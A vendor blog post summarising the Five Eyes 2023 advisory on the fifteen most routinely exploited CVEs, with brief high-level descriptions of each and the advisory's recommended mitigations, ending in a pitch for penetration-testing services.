2023 Top Routinely Exploited Vulnerabilities: Zero-day Exploits on the Rise

The 2023 Top Routinely Exploited Vulnerabilities Joint Cybersecurity Advisory has been released by the Five Eyes intelligence community (US, UK, Canada, Australia, New Zealand). Available through the website of the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) division, the report details the Common Vulnerabilities and Exposures (CVEs) most frequently exploited by bad actors, designated by their Common Weakness Enumerations (CWEs).

The report highlights key trends in cyberattacks and recommends mitigations for vendors, designers, developers, and end-user organizations. In this blog, we'll share some key insights from the report including:

• What the report reveals about a rise in zero-day exploits?
• The top 15 routinely exploited vulnerabilities of 2023
• The top three recommended mitigations

Rise in Zero-Day Exploits Targeting Enterprises

The Joint Cybersecurity Advisory reveals that attackers exploited more zero-day vulnerabilities to penetrate enterprise networks in 2023 than 2022, enabling them to focus on bigger targets. The majority of the most commonly exploited vulnerabilities started as zero-day attacks, an increase from less than half the previous year.

Attackers see the greatest results exploiting vulnerabilities within two years of their public revelation. As time goes on and more patches and upgrades are released, vulnerabilities yield increasingly lower returns for attackers. International efforts to reduce the lifespan of vulnerabilities also degrade their value to bad actors.

Top 15 Routinely Exploited Vulnerabilities in 2023

The Joint Cybersecurity Advisory identified these as the 15 most frequently exploited CVEs of 2023:

1. CVE-2023-3519
2. CVE-2023-4966
3. CVE-2023-20198
4. CVE-2023-20273
5. CVE-2023-27997
6. CVE-2023-34362
7. CVE-2023-22515
8. CVE-2021-44228
9. CVE-2023-2868
10. CVE-2022-47966
11. CVE-2023-27350
12. CVE-2020-1472
13. CVE-2023-42793
14. CVE-2023-23397
15. CVE-2023-49103

Here's a brief rundown on what each of these vulnerabilities targets and how it works:

1. CVE-2023-3519

Classified as critical, this vulnerability compromises Citrix NetScaler ADC and NetScaler Gateway. It allows an unauthenticated user to use a HTTP GET request to cause a stack buffer overflow in the NetScaler Packet Processing Engine (nsppe). Attackers can leverage this exploit to upload malicious files that enable remote control execution, privilege escalation, and credential access, setting the stage for discovery of system vulnerabilities and exfiltration of sensitive data. Read more from NIST.

2. CVE-2023-4966

Categorized as critical, this vulnerability targets Citrix NetScaler ADC and NetScaler Gateway. It allows attackers to read memory outside buffers, including session tokens (session token leakage), allowing attackers to impersonate authenticated users. Once the attacker has exploited this vulnerability, they can use it to perform reconnaissance on hosts and networks, harvest credentials, and move laterally within systems. Read more from NIST.

3. CVE-2023-20198

Considered critical, this vulnerability targets Cisco IOS XE Web UI. It enables unauthorized users to gain initial access and issue a command to create a local user and password combination, giving them the ability to log in with normal user access. Once the attacker has infiltrated the system, they can exploit other components of the UI and use the new user to escalate privileges to root privileges, gaining full administrator capability and effectively taking over the system. Read more from NIST.

4. CVE-2023-20273

Classified as high risk, this vulnerability targets Cisco IOS XE, building upon CVE-2023-20198. It leverages CVE-2023-20198 by using command injections to escalate privileges to root privileges. Read more from NIST.

5. CVE-2023-27997

Regarded as critical, this vulnerability targets Fortinet FortiOS and FortiProxy SSL-VPN. It uses a heap-based buffer overflow attack to enable a remote user to make requests to execute arbitrary code or commands. Attackers can use this exploit to download config files from devices and add malicious administrator accounts. Read more from NIST.

6. CVE-2023-34362

Flagged as critical, this vulnerability targets Progress MOVEit Transfer. It uses an SQL injection vulnerability to obtain a sysadmin API access token. This enables bad actors to use deserialization calls to execute remote code. Attackers potentially can exploit this vulnerability to gain insights into database structure and use SQL statements to change or delete data. Read more from NIST.

7. CVE-2023-22515

Classified as critical, this vulnerability targets Atlassian Confluence Data Center and Server. It enables bad actors to exploit improper input validation. Through XWorks2 middleware, arbitrary HTTP parameters can be transformed into getter/setter sequences, allowing run time modification of Java objects. Attackers can use this exploit to create new administrator users and upload malicious plugins to execute arbitrary code. Read more from NIST.

8. CVE-2021-44228

Recognized as critical, this vulnerability (Log4Shell) targets Apache’s Log4j library, a popular open source logging framework. Attackers can use this exploit to craft requests  that execute arbitrary code. A hacker can take over a system, exfiltrate data, upload ransomware, or launch other attacks. Bad actors began exploiting the vulnerability after it was publicly disclosed in December 2021. Read more from NIST.

9. CVE-2023-2868

Flagged as critical, this vulnerability targets the Barracuda Networks Email Security Gateway (ESG) Appliance. It allows bad actors to leverage input validation and sanitization errors to obtain unauthorized access and remotely execute system commands. According to the FBI, Chinese hackers have exploited this vulnerability to compromise computer networks. Read more from NIST.

10. CVE-2022-47966

Recognized as critical, this vulnerability targets multiple products using Zoho ManageEngine that depend on Apache Santuario. It manipulates improper validation of XML signatures in SAML assertions to enable unauthenticated users to provide a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint and execute arbitrary code. This allows attackers to seize control of servers in order to steal data, upload malware, or disrupt systems. Read more from NIST.

11. CVE-2023-27350

Treated as critical, this vulnerability targets the PaperCut MF/NG print management system. It exploits improper access control in the SetUpCompleted class to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code. Advanced persistent threat actors and ransomware groups have exploited this vulnerability. Read more from NIST. 

12. CVE-2020-1472

Regarded as a critical threat by the National Vulnerability Database and medium threat by Microsoft, this vulnerability targets Microsoft Netlogon. It allows unauthorized users to use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol. Attackers can exploit this vulnerability to escalate privileges. This CVE has made the top routinely exploited vulnerabilities lists since 2021. Read more from NIST.

13. CVE-2023-42793

Categorized as a critical risk, this vulnerability targets JetBrains TeamCity servers. It enables an authentication bypass which allows attackers to launch remote code execution against susceptible servers. Bad actors can use this vulnerability to gain administrative control of servers and launch supply chain attacks. Read more from NIST.

14. CVE-2023-23397

Flagged as critical, this vulnerability targets Microsoft Office Outlook. Threat actors can exploit this vulnerability by sending specially crafted emails that Outlook client will automatically trigger when Outlook processes them, even without user interaction. Attackers can use this vulnerability to escalate privileges. Russian actors have targeted this vulnerability, which has been exploited since at least April 2022.

15. CVE-2023-49103

Classified as a high risk by the National Vulnerability Database and a critical risk by MITRE, this vulnerability targets the ownCloud graphapi file sharing platform extension. This vulnerability allows unauthenticated users to target URL endpoints to leak sensitive information and gain access to data such as admin passwords, mail server credentials, and license keys.

Top Three Recommended Mitigations

To mitigate zero-day vulnerabilities, the Joint Cybersecurity Advisory recommends prioritizing three main strategies:

1. Adopt a security-centered approach to product development lifecycles
2. Promote incentives for vulnerability disclosure
3. Deploy endpoint detection and response (EDR) tools

1. Adopt a Security-centered Approach to Product Development Lifecycles

Patching zero-day vulnerabilities after they've been exploited gives bad actors a head start, and catching up can be lengthy and expensive. Software providers can gain an advantage on attackers by pre-emptively integrating security into the product development lifecycle. Robust testing and threat modeling can be implemented early in software development, reducing the likelihood of vulnerabilities emerging after products have been released. Accordingly, recent cybersecurity legislation such as the EU's Cyber Resilience Act requires developers to design products with security considerations in mind.

2. Promote Incentives for Vulnerability Disclosure

The Joint Cybersecurity Advisory report found that international cooperation to mitigate vulnerabilities reduced their lifespan, giving attackers a shorter window of opportunity to exploit them. Accordingly, the report recommends reducing barriers to responsible vulnerability disclosure by offering incentives. For instance, bug bounty reporting programs reward researchers with compensation and recognition for their contributions, providing a strong incentive to promote disclosure.

3. Deploy Endpoint Detection and Response (EDR) Tools

Endpoint detection and response tools use technologies such as artificial intelligence and automation to monitor networks for security incidents and respond to threats. Deploying EDR tools can accelerate detection of zero-day exploits and reduce their window of vulnerability. At least three of the top 15 vulnerabilities covered in the Joint Cybersecurity Advisory report were uncovered following EDR system reports of suspicious activity or device anomalies.

Identify and Remediate Vulnerabilities with Cobalt

Open vulnerabilities can wreak havoc on your system, but they depend on stealth to remain undetected. You can regain the advantage over attackers by deploying defenses informed by the latest CVE updates.

Cobalt helps you prevent exploits by providing Penetration Testing as a Service (PTaaS). Our team of pentesting experts help you test your system for exposure to vulnerabilities. Our user-friendly platform makes it easy for your team to collaborate with ours to rapidly schedule customized pentests, detect risks, and mitigate them. 

Get started by scheduling a demo to see how we can help you keep your network secure against exploits.